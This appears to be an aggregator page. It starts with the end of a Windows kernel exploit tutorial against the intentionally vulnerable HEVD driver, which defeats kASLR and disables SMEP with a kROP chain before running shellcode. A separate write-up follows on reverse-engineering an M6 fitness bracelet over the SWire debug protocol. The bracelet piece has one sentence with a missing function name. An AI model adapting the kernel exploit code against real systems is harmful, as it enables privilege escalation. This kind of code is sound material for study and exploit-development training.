    # The first entry returned by EnumDeviceDrivers() is the kernel image
    return base[0]


# Leak the kernel base from user mode to defeat kASLR
BASE_ADDRESS = get_kernel_base()
print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')

SHELLCODE = (
    b'\xb8\xef\xbe\xad\xde' +     # mov eax,0xdeadbeef
    b'\xcc'                       # INT3 -> software breakpoint
)

RET_PTR = KERNEL32.VirtualAlloc(
    c_int(0),                    # lpAddress
    c_int(len(SHELLCODE)),       # dwSize
    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE
    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE
)

KERNEL32.RtlMoveMemory(
    c_int(RET_PTR),              # Destination
    SHELLCODE,                   # Source
    c_int(len(SHELLCODE))        # Length
)

# kROP chain: disable SMEP through CR4, then return into the shellcode
ROP_CHAIN = (
    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret
    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8
    struct.pack('<L', 0x42424242) +                    #
    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP
    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret
    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode
)

PAYLOAD = (
    b'A' * 2080 +
    ROP_CHAIN
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

Looks good. Now check it:

Success

And this is the content of the CR4 register:

Success

As you can see, we were able to disable SMEP and set EAX to 0xdeadbeef!
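To make the role of the magic value concrete: according to Intel's architecture manuals, SMEP is controlled by bit 20 of CR4, so the value 0x000406e9 loaded by the ROP chain disables it because that bit is clear. The small Python sketch below checks this; the helper names are hypothetical and not part of the exploit, and the "SMEP set" value is constructed for illustration rather than read from the target.

```python
CR4_SMEP_BIT = 20  # CR4.SMEP: Supervisor Mode Execution Prevention


def smep_enabled(cr4: int) -> bool:
    """Return True if the SMEP bit is set in the given CR4 value."""
    return bool(cr4 & (1 << CR4_SMEP_BIT))


def clear_smep(cr4: int) -> int:
    """Return cr4 with only the SMEP bit cleared; all other bits are kept."""
    return cr4 & ~(1 << CR4_SMEP_BIT)


ROP_CR4_VALUE = 0x000406e9  # the value popped into CR4 by the ROP chain

print(hex(ROP_CR4_VALUE), "SMEP enabled:", smep_enabled(ROP_CR4_VALUE))
illustrative = ROP_CR4_VALUE | (1 << CR4_SMEP_BIT)  # hypothetical "SMEP on" value
print(hex(illustrative), "->", hex(clear_smep(illustrative)))
```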

Conclusions

In this post we were able to execute shellcode that set EAX to 0xdeadbeef. We also bypassed SMEP protection using a kROP chain and defeated kASLR by leaking the kernel base address from ring-3. However, we still have to get a privileged shell on this system, which will be covered in the next article.

Reverse Engineering the M6 Smart Fitness Bracelet

Original text by rbaron_

Following a year and a half of sitting inside the house, I set out to improve my wellbeing by getting a new fitness tracker. It worked out better than I expected: hacking on it kept me busy for a couple of months, at the small price of keeping me inside the house even longer.

Before starting, I stated my goals as follows. I wanted to:

  1. Understand its hardware
  2. Figure out how to talk to it
  3. Dump its stock firmware
  4. Get it to run custom code, ideally making use of its:
    • GPIO pins (both for input and output)
    • Color display
    • Bluetooth low energy (BLE) capabilities

I documented the process of going through these goals in the following sections. It’s been an incredibly fun journey. I hope you enjoy it as much as I did.

The M6 Fitness Tracker Bracelet(s)

The particular bracelet we are talking about is the M6 from AliExpress (screenshot). I believe the name is an attempt to piggyback on the popularity of the $50, entry-level Xiaomi Mi Smart Band 6 fitness tracker. At a $6 price point, our device is an even more entry-level bracelet and, to put it politely, it draws a lot of inspiration from the Xiaomi one.

Front of the M6 box

Hardware Overview

Disassembling the plastic case is so easy that it’s difficult to trust the IP67 water resistance rating claimed on the box.

Inside, we see some interesting stuff:

  • A Telink TLSR8232 system-on-a-chip (SoC)
  • A 0.96” (160×80 px) color display
  • A tiny ~100 mAh LiPo battery and USB charging circuit
  • A vibration motor
  • A (most likely) fake heart rate sensor

The Brains

Top view of the printed circuit board

The SoC in the M6 is a Telink TLSR8232 (datasheet). Some specs:

  • 32-bit CPU
    • Closed architecture (usually referred to as tc32, similar to ARM9) — not a lot of resources about it
    • 24 MHz clock speed
  • 16kB of SRAM
  • 512kB of internal flash
  • 32kHz onboard oscillator for low power mode
  • SWS (Single Wire Slave) interface for debugging and programming
  • Integrated Bluetooth Low Energy (BLE) transceiver
  • Low power operation (alleged ~2 uA in deep sleep)

As luck would have it, just a few months ago I had seen a Telink chip in my little, hackable Xiaomi thermometer. At that point, I re-flashed it with @atc1441’s alternative firmware. Even though it’s a different SoC model, this gave me a little hope and a valuable starting point.

Exposed Pads

Bottom view of the printed circuit board (1/2)
Bottom view of the printed circuit board (2/2)

Armed with nothing but a multimeter, a datasheet and good intentions, I traced where the exposed pads are connected. This is what I came up with:

Pad    SoC Pin #   SoC Pin Label
SWS    01          SWS/ANA_C<7>
DAT    06          ANA_A<4>
TEST   27          ANA_C<1>
TX     18          ANA_B<4>
RX     19          ANA_B<5>

The Single Wire (aka. SWire or SWS) Interface

Now that we identified the brains of the bracelet, we turn to the goal of actually talking to it. If you programmed an ESP32 before, you probably relied on its bootloader and talked to it via UART. If you programmed or debugged an ARM microcontroller before, you probably used the SWD (serial wire debug) protocol.

In Telink-land, the analogous interface is called Single Wire or SWire. This is how apps are loaded into its flash memory, how its memory is read and written, and how it’s debugged at runtime.

The real fun begins, though, when we try to learn more about this interface. The datasheet is almost comically quiet about it, as if pretending it doesn’t exist.

In the real world, where real programmers do real work, these chips are flashed and debugged with Telink’s official Burning and Debugging Tool. In the past, it seems hobbyists could get these devices very easily, but I couldn’t find them in the usual places at the beginning of the project. Now, as I write this post, it seems they recently became available on Mouser.

While the lack of specs and of a programmer set the stage for a very unsatisfying dead end, this is, in fact, where things start to get interesting. The deep dive into the SWire specs and alternative tooling has been the most rewarding part of the project. Read on.

The Missing Specs

In what could be the nerdiest Indiana Jones spin-off yet, “the search for the missing SWire specs” brought me to the work of pvvx. Victor, in addition to maintaining a forked and low-power-optimized version of the alternative Xiaomi thermometer firmware from earlier, is a bona fide SWire ninja.

I struck gold when I came across one of his repositories, the TlsrTools. In there, there’s an excerpt of a PDF that contains a brief, two-page description of the SWire protocol. This seems to be a part of an old version of a Telink datasheet that has since been chopped off. That’s great news. We’re back in the game.

The Alternative Programmer

Victor also bootstrapped a whole new open source programmer for some Telink chips based on the beloved and ubiquitous STM32 Blue Pill board. This means that potentially both our roadblocks are removed — we have a (terse) SWire interface spec and a programmer.

At this point I start to really enjoy the process of demystifying SWire. It reminded me of the heartwarming story of when Paul McCartney and John Lennon got on a bus across Liverpool to meet a fellow they heard knew about the B7 chord. Now here I am, getting on the proverbial bus to meet this single fellow I heard knew about the SWire interface.

The bus takes me to interesting places. I can’t recognize the street signs, but the view looks amazing. I imported the STM32 code into my editor and translated some of its Russian comments.

This cross-language detective work gave me a relatively good understanding of the SWire protocol and of how to use Victor’s alternative programmer. There’s still a pressing question remaining, though. Victor’s programmer is made for TLSR826x chips, and we’ve got a TLSR8232 chip on our hands.

From Pascal to Python

There are usually three moving parts when programming/debugging a chip:

  1. The target board we want to program
  2. The programmer hardware
  3. The computer software that talks to the programmer

In Victor’s alternative programmer, the computer software is a Pascal, Windows-only application. I think it is a prime example of getting real stuff done with the language at hand.

The role of the computer software is to send commands to the programmer hardware and get it to read/write data from/to the target board. As I don’t have a Windows box at home, I implemented a barebones Python script, tlsr82-debugger-client.py, which works as the computer software component.

We can now use this Python script and the STM32 to hopefully speak SWire with our M6 bracelet. The setup is as follows:

The STM32-based alternative programming setup

SWire Protocol Overview

Let’s take a dip into the mysterious SWire spec.

As the name suggests, a single wire is used for transmitting data back and forth between two devices: in our case, the STM32 programmer (the master) and the target board (the slave). There is no separate clock line as in SPI or I2C. The single-wire topology allows both devices to speak, but not at the same time. In other words, SWire is an asynchronous, half-duplex interface.

These two key aspects of SWire imply that:

  • Asynchronous: since there’s no shared clock, both devices must somehow employ compatible reading & writing speeds
  • Half duplex: each device must know when it should listen to messages and when it’s allowed to transmit messages. There must be a precisely choreographed dance between the two parties

To achieve coordination, the SWire protocol attributes responsibilities to the master and slave devices. The master is responsible for initiating the communication and managing the bus logic level between data transfers. The slave is responsible for sending data when it’s expected to. I put together some real-world examples below to make this clearer.

Sending a Single Bit

The first thing to notice is how bits are encoded in the wire. Each bit is transmitted in five units of time:

  • To send a 0, keep the voltage low for one unit and high for 4 units;
  • To send a 1, keep the voltage low for 4 units of time and high for 1 unit.
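A minimal Python model of this encoding, treating each time unit as one sample of the bus level (0 = low, 1 = high). The function names are illustrative and not taken from the author's script; real hardware produces these levels with timers, not lists.

```python
from typing import List

LOW, HIGH = 0, 1
UNITS_PER_BIT = 5


def encode_bit(bit: int) -> List[int]:
    """Return the bus level for each of the 5 time units of one SWire bit."""
    low_units = 4 if bit else 1  # a 1 stays low much longer than a 0
    return [LOW] * low_units + [HIGH] * (UNITS_PER_BIT - low_units)


def to_waveform(levels: List[int]) -> str:
    """Render bus levels as text: '_' for low, '#' for high."""
    return "".join("#" if level else "_" for level in levels)


print(to_waveform(encode_bit(0)))  # _####
print(to_waveform(encode_bit(1)))  # ____#
```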

To make matters concrete, here is a real SWire transmission I captured with a logic analyzer:

Example of a 0 and a 1 in SWire

In the above screenshot, there are 8 bits being transmitted between the flags marked as 25 and 26. Can you decode these 8 bits? If you’re feeling brave, let me know your answer.
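One way to decode a capture like this, sketched under the assumption that the low and high durations of each bit have already been measured (in any unit): since a 0 is short-low/long-high and a 1 is long-low/short-high, comparing the two halves of each bit is enough, whatever the absolute bit rate. Packing bits most-significant first is an assumption here, not something the capture itself proves, and the helper names and sample durations are made up.

```python
from typing import List, Tuple


def decode_bits(pulses: List[Tuple[float, float]]) -> List[int]:
    """Classify each (low_duration, high_duration) pair as an SWire bit.

    A 0 is ~1 unit low + ~4 units high and a 1 is ~4 units low + ~1 unit
    high, so comparing the two halves works at any bit rate.
    """
    return [1 if low > high else 0 for low, high in pulses]


def bits_to_byte(bits: List[int]) -> int:
    """Pack 8 bits into one byte, most-significant bit first (assumed order)."""
    if len(bits) != 8:
        raise ValueError("expected exactly 8 bits")
    value = 0
    for bit in bits:
        value = (value << 1) | bit
    return value


# Made-up durations (microseconds) for two bits: a 0 followed by a 1.
print(decode_bits([(0.25, 1.0), (1.0, 0.25)]))  # [0, 1]
```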

Sending a Single Byte

We now know how individual bits look in the wire. To transmit a full byte, the SWire protocol specifies that 9 bits are needed:

  • Bit 1: The cmd bit. 0 specifies that the message contains data and 1 specifies that the message is a command
  • Bits 2-9: The message content (8 bits)
  • One time unit of low level to signal the end of the message

Again, let’s take a look at a real-world example transmission of a 0xb0 byte:

Example of sending one byte in SWire

After the last unit of low is sent, the bus is released and goes back to its natural high voltage. In other words, the SWire data bus is pulled high.
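Building on that framing, here is a hedged Python sketch of how one byte turns into bus levels: the cmd bit, eight content bits and the closing low unit, 46 time units in total. The most-significant-bit-first order and the helper names are assumptions for illustration; the per-bit encoding is the 1-low/4-high and 4-low/1-high scheme described earlier.

```python
from typing import List

LOW, HIGH = 0, 1


def encode_bit(bit: int) -> List[int]:
    """5 time units per bit: 0 -> 1 low + 4 high, 1 -> 4 low + 1 high."""
    low_units = 4 if bit else 1
    return [LOW] * low_units + [HIGH] * (5 - low_units)


def encode_byte(value: int, is_cmd: bool = False) -> List[int]:
    """Encode one SWire byte: cmd bit, 8 content bits (MSB first, assumed), end unit."""
    if not 0 <= value <= 0xFF:
        raise ValueError("value must fit in one byte")
    bits = [1 if is_cmd else 0] + [(value >> i) & 1 for i in range(7, -1, -1)]
    levels: List[int] = []
    for bit in bits:
        levels += encode_bit(bit)
    levels.append(LOW)  # one low unit ends the byte; then the bus is released (pulled high)
    return levels


print(len(encode_byte(0xB0)))  # 46 = 9 bits * 5 units + 1 end unit
```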

Write Requests

We saw how individual bits and bytes are encoded in the wire. Next, let’s take a look at how the SWire protocol specifies a byte to be written at a specific address. In this scenario, the master wants to write a byte b to the address addr in the slave’s memory.

To do so, the master must send a sequence of bytes, each one encoded as described in the section above:

  1. The START byte. This one always has the value 0x5a
  2. The most significant 8 bits of the target addr
  3. The least significant 8 bits of the target addr
  4. The RW_ID byte. Its most significant bit should be set to 0 for write operations
  5. The byte value b
  6. The END byte. It always has the value 0xff
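The byte sequence above is easy to express as data. The Python sketch below builds the list of (cmd bit, value) pairs for a write request; it is an illustration, not the author's make_write_request. Two details are assumptions: that START and END are sent with the cmd bit set while all other bytes are data, and that the remaining seven bits of RW_ID are zero. The addr_len parameter accounts for chips that use three address bytes instead of two.

```python
from typing import List, Sequence, Tuple

START = 0x5A
END = 0xFF
RW_ID_WRITE = 0x00  # MSB = 0 selects a write; other bits assumed zero

Frame = List[Tuple[bool, int]]  # (cmd bit set?, byte value)


def build_write_frame(addr: int, data: Sequence[int], addr_len: int = 2) -> Frame:
    """Return the byte sequence of an SWire write request (hypothetical helper)."""
    frame: Frame = [(True, START)]
    # Address bytes, most significant first.
    for shift in range(8 * (addr_len - 1), -1, -8):
        frame.append((False, (addr >> shift) & 0xFF))
    frame.append((False, RW_ID_WRITE))
    frame.extend((False, b & 0xFF) for b in data)  # one or more data bytes
    frame.append((True, END))
    return frame


# Writing 0x05 to address 0x0602:
for is_cmd, value in build_write_frame(0x0602, [0x05]):
    print(int(is_cmd), hex(value))
```

Passing several values in data yields a multi-byte write with the same header and trailer.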

Let’s look at the following example:

Example of writing data in SWire

In this example, we can see the byte 0x05 being written into the slave’s memory address 0x0602.

Variations of the SWire Protocol

It’s worth noting that there exists at least one variation of the SWire protocol. In the other variant, the master sends 3 bytes of addr after the START byte, instead of only two bytes in our SWire protocol. The 3-byte variant is employed, for example, in Telink’s TLSR8251 SoCs, used in the Xiaomi thermometer we mentioned above. In the Python-based flasher in the ATC_MiThermometer repository, we can see where the 3 bytes of addr are specified in the read/write requests from the master to the slave device.

Writing multiple bytes

That’s a lot of overhead for writing a single byte. Luckily, the protocol lets us write multiple data bytes at once. To do so, the master simply sends a sequence of data bytes after the RW_ID byte, instead of a single byte like in the example above, and then finishes with the END byte.

Read Requests

Read requests are very similar to write requests. There are only two important differences:

  1. The most significant bit of the RW_ID byte is set to 1
  2. Instead of sending data after the RW_ID byte, the master reads data from the SWire data line

Again, take the following example. To make things more interesting, in this example the master reads two bytes from the slave:

Example of reading data in SWire

After sending the RW_ID byte, the master sends one unit of low level. The slave responds with 8 bits of data and one unit of low level. The master can request more data by writing a single unit of low level; otherwise the master sends the END byte (0xff) and the transmission is over.
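The read flow can be outlined the same way. In this Python sketch, send_byte and read_slave_byte are hypothetical callbacks standing in for the programmer's bit-level I/O (read_slave_byte is assumed to emit the master's one-unit low pulse and return the slave's 8 bits). The RW_ID value 0x80 assumes the low seven bits are zero, and START/END are again assumed to carry the cmd bit.

```python
from typing import Callable, List, Tuple

START, END = 0x5A, 0xFF
RW_ID_READ = 0x80  # MSB = 1 selects a read; other bits assumed zero


def build_read_header(addr: int) -> List[Tuple[bool, int]]:
    """START, 2-byte address and RW_ID, as (cmd bit set?, value) pairs."""
    return [(True, START), (False, (addr >> 8) & 0xFF),
            (False, addr & 0xFF), (False, RW_ID_READ)]


def read_transaction(addr: int, count: int,
                     send_byte: Callable[[bool, int], None],
                     read_slave_byte: Callable[[], int]) -> List[int]:
    """Send the read header, clock in `count` bytes, then close with END."""
    for is_cmd, value in build_read_header(addr):
        send_byte(is_cmd, value)
    data = [read_slave_byte() for _ in range(count)]
    send_byte(True, END)  # instead of another low pulse, END finishes the transfer
    return data
```

With fake callbacks that record what is sent and replay two bytes, a 2-byte read of 0x007e sends START, 0x00, 0x7e, RW_ID and END, and returns whatever the fake slave produced.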

Let’s zoom into the transmission of multiple bytes during the read request, just after the RW_ID byte above:

Zoom into the multi-byte read request

In this example, the master reads the value 0x5316 from the slave’s address 0x007e.

The address 0x007e we just read is, in fact, a special register in the TLSR82xx chips. It holds the “Chip ID”. For our TLSR8232, the Chip ID is 0x5316.
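Note that the two ID bytes travel low byte first: in the speed-mismatch capture of this same read, the slave’s response starts with 0x16. A tiny Python helper (hypothetical name) makes that byte order explicit:

```python
TLSR8232_CHIP_ID = 0x5316


def chip_id_from_bytes(raw: bytes) -> int:
    """Combine the two bytes read from address 0x007e, low byte first."""
    if len(raw) != 2:
        raise ValueError("expected exactly two bytes")
    return int.from_bytes(raw, "little")


print(hex(chip_id_from_bytes(bytes([0x16, 0x53]))))  # 0x5316
```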

You can find this whole annotated logic analyzer capture in get_soc_id.sal. It includes read and write requests.

Speed Mismatch Hazard

In the read example above, we saw that both the master and the slave read from and write to the same bus. They must understand each other’s messages. A crucial setting is the speed at which both devices transmit data.

Let’s turn to the following pathological example. It is the same read request for address 0x007e as above:

Example of speed mismatch between the master and slave

Take a look at what happens after the master sends its RW_ID byte. The slave starts responding, but at a visibly lower speed. We can see that the bits are encoded in much wider windows than the previous ones sent from the master. Also note that, even though the whole transmission failed, the beginning of the slave’s response seems promising. It starts with 0x16, which is the expected first byte of the “Chip ID”.

This speed mismatch is a problem. It breaks the precise dance that the master has to coordinate. But not all is lost: from this observation we can draw two important conclusions, a bad one and a good one:

  1. Bad one: To read data, the slave’s speed has to be compatible with the master’s speed, otherwise the master fails to coordinate the whole operation. I believe we could find a solution that adjusts this speed and gets the master to adapt its pace to the slave’s speed, but this is not currently done
  2. Good one: Writing data seems to be a less coordination-sensitive operation. As we noted above, the slave seems to have correctly understood the bytes sent from the master (which spell “read request for address 0x007e”), even though the slave itself is misconfigured with a slower speed

The last piece of the speed puzzle is that we can configure the slave’s speed by writing to one of its special registers. From the “missing SWire spec”, we see a little note about the register at the address 0xb2:

Slave’s SWire speed control register

In short, we can tune the slave’s SWire speed by writing to its 0xb2 memory address.

On the other end, we also need to set up the master’s SWire speed.

The strategy that has worked is to fix the master’s SWire speed at a reasonable value and try a few possible speeds for the slave. This is precisely what our Python script does (edited for brevity):


# Writes the value `speed` into the slave's 0x00b2 register.
def set_speed(speed):
    return write_and_read_data(make_write_request(0x00b2, [speed]))

def find_suitable_sws_speed():
    for speed in range(2, 0x7f):
        set_speed(speed)
        try:
            get_soc_id()
        except Exception:
            continue
        else:
            print(f'Found and set suitable SWS speed: {speed}')
            return speed
    raise RuntimeError("Unable to find a suitable SWS speed")

def init_soc(sws_speed=None):
    ...
    # Set up the master speed.
    set_pgm_speed(0x03)

    # If the user specified a slave speed, use that.
    if sws_speed is not None:
        set_speed(sws_speed)
    # Otherwise try many different ones until one works.
    else:
        find_suitable_sws_speed()

Invalid CPU State Hazard

Another tricky trap is the fact that sometimes the slave’s CPU does not seem to respond to SWire requests. I haven’t found the precise reason, but my guess is that SWire doesn’t work when the slave is in some power saving mode or has interrupts disabled.

In practice, it means that it can be difficult to start a SWire exchange depending on the program that is running on the target device. To overcome this, pvvx’s strategy is to:

  • Reset the device (by pulling its RST pin low)
  • Start bombarding the target device with “CPU stop” SWire commands while the RST pin is pulled high

The objective here is to catch the CPU in a good state as it resets, before the application messes with it too much.

Trick for stopping the CPU as early as possible

For the extra curious reader, the “CPU stop” SWire command is a simple write request of 0x05 to address 0x0602. This address corresponds to a special register that controls the CPU state.
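Put together, the reset-and-bombard trick might look like the Python sketch below. set_rst and write are hypothetical hooks into the programmer (in the real setup this timing lives on the STM32 side), and the window and hold durations are guesses meant to be tuned. The register address and value are the 0x0602/0x05 pair above.

```python
import time
from typing import Callable

CPU_CTRL_ADDR = 0x0602  # CPU state control register
CPU_STOP = 0x05         # value that halts the CPU


def stop_cpu_after_reset(set_rst: Callable[[bool], None],
                         write: Callable[[int, bytes], None],
                         window_s: float = 0.05,
                         hold_s: float = 0.01) -> int:
    """Reset the target, then repeat "CPU stop" writes while it boots.

    set_rst(False) pulls RST low, set_rst(True) releases it; write(addr, data)
    issues one SWire write request. Returns the number of stop commands sent.
    """
    set_rst(False)            # hold the SoC in reset
    time.sleep(hold_s)
    set_rst(True)             # release reset: the firmware starts running
    deadline = time.monotonic() + window_s
    sent = 0
    while True:               # always send at least one stop command
        write(CPU_CTRL_ADDR, bytes([CPU_STOP]))
        sent += 1
        if time.monotonic() >= deadline:
            return sent
```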

Getting to the RST Pin

The RST trick above works really well. The only downside is that, if you look at the M6 board, the RST pin is not broken out to any pad.

Getting to the RST pin. Toothpick for scale

In the datasheet, we can see that the TLSR8232 RST is on pin 26. On the M6 board, this pin connects directly to a tiny capacitor, as shown in the photo above. This is a tricky soldering job, but it’s doable with a pre-tinned wire and a little bit of flux.

Alternative Tricks — No RST Soldering Required (Possibly)

While having the RST pin available makes life easier and working with SWire more predictable, it might not be strictly necessary. Two ideas to get around it:

  1. Just try it without the RST pin. You might find that it just works. In fact, if you look at how the Xiaomi thermometer alternative firmware is flashed, you will find out that the RST is not needed there
  2. As a last resort, you can try to manually power cycle the target board while the “CPU stop” bombardment is going on. You might try to tweak the code to increase this time window

Reading the SoC ID

With the content we covered so far, we are ready to take a look at a real-world scenario. Using the tlsr82-debugger-client.py Python script to read the target device’s memory:


% python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 get_soc_id
Trying speed 2
Trying speed 3
Trying speed 4
Trying speed 5
Trying speed 6
Trying speed 7
Found and set suitable SWS speed: 7
SOC ID: 0x5316

Behind the scenes, this invocation takes some of the steps we covered previously:

  1. Reset the target board by pulling RST low
  2. Bombard the target board by writing many “CPU stop” values to its CPU control register while RST is pulled high
  3. Set up the master’s SWire speed
  4. Iterate over possible SWire speeds for the target board until a suitable one is found
  5. Issue a 2-byte read request to address 0x007e

Reading and Writing to the Internal Flash Memory

One of our goals is to dump the target board’s firmware. It is stored in the board’s internal flash memory. While the details of the SWire protocol are not public, Telink does offer an SDK for the TLSR8232 SoC. In there, the file ble_sdk_hawk/drivers/5316/flash.c contains the code the chip uses to read and write its own internal flash (comments are my own):


_attribute_ram_code_ void flash_write_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  // Chip select low via register 0x0d, then writes value 6 to register 0x0c (spi data register).
  flash_send_cmd(FLASH_WRITE_ENABLE_CMD);
  // Chip select low via register 0x0d, then writes value 2 to register 0x0c (spi data register).
  flash_send_cmd(FLASH_WRITE_CMD);
  // Writes 3 bytes of the target address to register 0x0c (spi data register).
  flash_send_addr(addr);

  unsigned int i;
  for(i = 0; i < len; ++i){
    // Write data byte to register 0x0c (spi data register).
    mspi_write(buf[i]);
    mspi_wait();
  }
  // Chip select high.
  mspi_high();
  flash_wait_done();

  irq_restore(r);
}

_attribute_ram_code_ void flash_read_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  // Chip select low via register 0x0d, then writes value 3 to register 0x0c (spi data register).
  flash_send_cmd(FLASH_READ_CMD);
  // Writes 3 bytes of the target address to register 0x0c (spi data register).
  flash_send_addr(addr);

  // Dummy write to register 0x0c (spi data register).
  mspi_write(0x00);
  mspi_wait();
  // Writes value 0x0a to register 0x0d (spi control register).
  mspi_ctrl_write(0x0a);
  mspi_wait();
  /* get data */
  for(int i = 0; i < len; ++i){
    // Reads byte from register 0x0c (spi data register).
    *buf++ = mspi_get();
    mspi_wait();
  }
  // Chip select high.
  mspi_high();

  irq_restore(r);
}

We can see that interacting with the internal flash boils down to writing to the target board’s SPI control register (at address 0x0d) and reading/writing to the SPI data register (0x0c), as well as manipulating the SPI chip select logic level.
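Following that reasoning, flash_read_page() can be translated into a flat list of register operations that a host script would replay over SWire. This Python sketch only builds the list (performing the reads is left to the caller); the chip-select values 0x00/0x01 on register 0x0d match those used by the write_flash function of the debugger script, and 0x0a is copied from the SDK code without interpreting its individual bits. All names are hypothetical.

```python
from typing import List, Tuple

SPI_DATA = 0x0C  # SPI data register
SPI_CTRL = 0x0D  # SPI control register (also drives chip select)
FLASH_READ_CMD = 0x03

Op = Tuple[str, int, int]  # ("w", register, value) or ("r", register, 0)


def flash_read_ops(addr: int, length: int) -> List[Op]:
    """Register operations mirroring the SDK's flash_read_page()."""
    ops: List[Op] = [("w", SPI_CTRL, 0x00)]                 # chip select low
    ops.append(("w", SPI_DATA, FLASH_READ_CMD))              # read command
    ops += [("w", SPI_DATA, (addr >> s) & 0xFF) for s in (16, 8, 0)]  # 24-bit address
    ops.append(("w", SPI_DATA, 0x00))                        # dummy write
    ops.append(("w", SPI_CTRL, 0x0A))                        # value from flash_read_page()
    ops += [("r", SPI_DATA, 0)] * length                     # one read per data byte
    ops.append(("w", SPI_CTRL, 0x01))                        # chip select high
    return ops


for op in flash_read_ops(0x000100, 2):
    print(op)
```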

Since we know how to interact with the target board’s memory addresses via SWire, we can implement the exact same operations in our Python script, targeting reads and writes to the SPI control and data registers (0x0d and 0x0c, respectively). This is exactly what I did. For instance, check out the write_flash function:


def write_flash(addr, data):
    send_flash_write_enable()

    # Chip select low.
    write_and_read_data(make_write_request(0x0d, [0x00]))

    # Write command.
    write_and_read_data(make_write_request(0x0c, [0x02]))

    # Flash address.
    write_and_read_data(make_write_request(0x0c, [(addr >> 16) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [(addr >> 8) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [addr & 0xff]))

    # Write data.
    write_and_read_data(make_write_request(0x0c, data))

    # Chip select (CSN) high.
    write_and_read_data(make_write_request(0x0d, [0x01]))

The 

 function works similarly.

Dumping the Firmware

With the ability to read the target board’s internal flash over SWire, we can now dump the M6’s firmware:


$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 dump_flash flash.bin
Found and set suitable SWS speed: 7
Dumping flash to flash.bin...
CPU stop.
CSN high.
0x000000 00.00%
0x000100 00.05%
0x000200 00.10
...
0x07cd00 99.85%
0x07ce00 99.90%
0x07cf00 99.95%
Writing 512000 bytes to flash.bin
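The numbers in this log are consistent with a simple loop: 512000 bytes (0x7d000) read in 0x100-byte chunks is 2000 reads, and each line shows the chunk address as a fraction of the total (0x100 / 512000 = 0.05%). A Python sketch of such a loop, where read_chunk is a hypothetical stand-in for the SWire flash read and the output format merely imitates the log:

```python
from typing import Callable


def dump_flash(read_chunk: Callable[[int, int], bytes],
               total: int = 512000, chunk: int = 0x100) -> bytes:
    """Read `total` bytes in `chunk`-sized pieces, printing progress per chunk."""
    out = bytearray()
    for addr in range(0, total, chunk):
        print(f"0x{addr:06x} {100 * addr / total:05.2f}%")
        out += read_chunk(addr, min(chunk, total - addr))
    return bytes(out)
```

With the defaults, the first lines printed are 0x000000 00.00% and 0x000100 00.05%, and the last one is 0x07cf00 99.95%.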

You can find the raw dump in the project’s repository, under dumped/flash.bin.

SDK, Compiler & Docker Image

With the first major goal of dumping the firmware behind us, we now turn to the challenge of running our own code on it. The first step is to get the SDK and compiler for the TLSR8232.

The SDK is available on Telink’s website. The one I used is listed in the “Bluetooth LE Generic” section. Unpacking the SDK reveals it’s integrated with Telink’s own IDE, which is based on Eclipse and seems to be available only for Windows. This is fine, but I wanted to make things easier by creating a single Dockerfile with the whole environment needed for compiling TLSR8232 programs.

Googling around brought me to the Ai-Thinker-Open/Telink_825X_SDK repository. It contains an SDK for Telink chips and refers to a Linux tc32 toolchain, which is exactly what we need for running it under Docker. I used the tc32 toolchain and the TLSR8232 BLE SDK to set up a Dockerfile that makes compiling our custom code simpler.

With this, we can simply spin up a Docker container and type make to compile our code. We can build the blinky binary by doing:


# In the example-programs directory.
# Build the Docker image from the Dockerfile.
$ docker build -t tlsr8232 .

# Run the Docker container and mount the current directory into /app.
$ docker run -it --rm -v "${PWD}":/app tlsr8232

# Inside the Docker container, compile the blinky example.
$ cd blinky/
$ make
...

# The compiled binary file is in _build/blinky.bin.
$ ls _build/blinky.bin
_build/blinky.bin

Blinky

The time has come. We now have all the tools and knowledge to compile and burn our own little firmware on the M6 bracelet. I hooked up a red LED to the TX pad and set out to make it blink.

The sample code for the blinky can be found in the GitHub repo under example-programs/blinky. Here is the entirety of its main() function:


int main() {
  cpu_wakeup_init();
  clock_init(SYS_CLK_16M_Crystal);
  gpio_init();

  // TX pad.
  gpio_set_func(GPIO_PB4, AS_GPIO);
  gpio_set_output_en(GPIO_PB4, 1);
  gpio_set_input_en(GPIO_PB4, 0);
  gpio_write(GPIO_PB4, 1);

  while (1) {
    gpio_toggle(GPIO_PB4);
    sleep_ms(500);
  }
  return 0;
}

As we did all the hard work of setting up the SDK & toolchain within our Docker image, compiling it is a breeze, as we saw in the previous section. We just have to use our Dockerfile, mount the example-programs/ repository directory into /app and type make on the example we want to build:


root@c54c8204641d:/app/blinky# make
mkdir -p _build/drivers
...
/opt/tc32/bin/tc32-elf-gcc -c -Wall -std=gnu99 -DMCU_STARTUP_5316 -I /opt/8232_BLE_SDK/ble_sdk_hawk/ -ffunction-sections -fdata-sections -o _build/main.o main.c
/opt/tc32/bin/tc32-elf-ld --gc-sections -T /opt/8232_BLE_SDK/ble_sdk_hawk/boot.link -o _build/blinky _build/main.o _build/drivers/gpio.o _build/drivers/analog.o _build/drivers/clock.o _build/drivers/bsp.o _build/drivers/adc.o _build/asm/cstartup_5316.o /opt/8232_BLE_SDK/ble_sdk_hawk/proj_lib/liblt_5316.a
/opt/tc32/bin/tc32-elf-objcopy -O binary _build/blinky _build/blinky.bin

Burning the compiled firmware in the M6 board is done with our trusty Python script:


$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 write_flash ../example-programs/blinky/_build/blinky.bin
Found and set suitable SWS speed: 7
Erasing flash...
Flash status: 03
Flash status: 00
Writing flash from ../example-programs/blinky/_build/blinky.bin...
0x0000 00.00%
0x0100 03.35%
0x0200 06.71%
...
0x1c00 93.92%
0x1d00 97.27%
Flash status: 00

